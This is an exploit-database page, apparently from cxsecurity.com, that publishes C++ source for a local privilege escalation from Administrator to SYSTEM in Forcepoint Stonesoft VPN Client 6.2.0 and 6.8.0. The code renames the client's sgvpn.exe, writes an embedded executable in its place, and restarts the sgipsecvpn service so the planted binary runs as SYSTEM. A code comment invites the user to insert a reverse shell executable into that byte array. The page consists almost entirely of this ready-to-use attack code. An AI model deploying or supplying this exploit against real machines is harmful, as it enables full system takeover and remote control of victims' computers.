Forcepoint (Stonesoft VPN Client) 6.2.0 / 6.8.0 Local Privilege Escalation

2023.04.02
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264

# Exploit Author : TOUHAMI KASBAOUI # Vendor Homepage : https://www.forcepoint.com/ # Software: Stonesoft VPN Windows # Version : 6.2.0 / 6.8.0 # Tested on : Windows 10 # CVE : N/A #Description local privilege escalation vertical from Administrator to NT AUTHORITY / SYSTEM #define UNICODE #define _UNICODE #include <Windows.h> #include <iostream> using namespace std; enum Result { unknown, serviceManager_AccessDenied, serviceManager_DatabaseDoesNotExist, service_AccessDenied, service_InvalidServiceManagerHandle, service_InvalidServiceName, service_DoesNotExist, service_Exist }; Result ServiceExists(const std::wstring& serviceName) { Result r = unknown; SC_HANDLE manager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, GENERIC_READ); if (manager == NULL) { DWORD lastError = GetLastError(); if (lastError == ERROR_ACCESS_DENIED) return serviceManager_AccessDenied; else if (lastError == ERROR_DATABASE_DOES_NOT_EXIST) return serviceManager_DatabaseDoesNotExist; else return unknown; } SC_HANDLE service = OpenService(manager, serviceName.c_str(), GENERIC_READ); if (service == NULL) { DWORD error = GetLastError(); if (error == ERROR_ACCESS_DENIED) r = service_AccessDenied; else if (error == ERROR_INVALID_HANDLE) r = service_InvalidServiceManagerHandle; else if (error == ERROR_INVALID_NAME) r = service_InvalidServiceName; else if (error == ERROR_SERVICE_DOES_NOT_EXIST) r = service_DoesNotExist; else r = unknown; } else r = service_Exist; if (service != NULL) CloseServiceHandle(service); if (manager != NULL) CloseServiceHandle(manager); return r; } bool ChangeName() { LPCWSTR parrentvpnfilename = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe"; LPCWSTR newName = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn_old.exe"; bool success = MoveFile(parrentvpnfilename, newName); if (success) { cerr << "[+] SVGVPN filename changed.\n"; } else { cerr << "Failed to rename file \n"; } return 0; } int main() { const uint8_t shellcode[7168] = { 0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, }; //You can set array bin of your reverse shell PE file here std::wstring serviceName = L"sgipsecvpn"; Result result = ServiceExists(serviceName); if (result == service_Exist) std::wcout << L"The VPN service '" << serviceName << "' exists." << std::endl; else if (result == service_DoesNotExist) std::wcout << L"The service '" << serviceName << "' does not exist." << std::endl; else std::wcout << L"An error has occurred, and it could not be determined whether the service '" << serviceName << "' exists or not." << std::endl; ChangeName(); HANDLE fileHandle = CreateFile(L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); cerr << "[*] Loading Malicious file into main PE of Forcepoint Installer \n"; if (fileHandle == INVALID_HANDLE_VALUE) { cerr << "Failed to create shellcode\n"; return 1; } DWORD bytesWritten; if (!WriteFile(fileHandle, shellcode, sizeof(shellcode), &bytesWritten, NULL)) { cerr << "Failed to write to file\n"; CloseHandle(fileHandle); return 1; } CloseHandle(fileHandle); cout << "[+] Payload exported to ForcePointVPN \n"; Sleep(30); cout << "[+] Restart ForcePointVPN Service \n"; SC_HANDLE scmHandle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); SC_HANDLE serviceHandle = OpenService(scmHandle, TEXT("sgipsecvpn"), SERVICE_ALL_ACCESS); SERVICE_STATUS serviceStatus; QueryServiceStatus(serviceHandle, &serviceStatus); if (serviceStatus.dwCurrentState == SERVICE_RUNNING) { ControlService(serviceHandle, SERVICE_CONTROL_STOP, &serviceStatus); while (serviceStatus.dwCurrentState != SERVICE_STOPPED) { QueryServiceStatus(serviceHandle, &serviceStatus); Sleep(1000); } } StartService(serviceHandle, NULL, NULL); CloseServiceHandle(serviceHandle); CloseServiceHandle(scmHandle); return 0; }


Vote for this issue:
75%
25%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top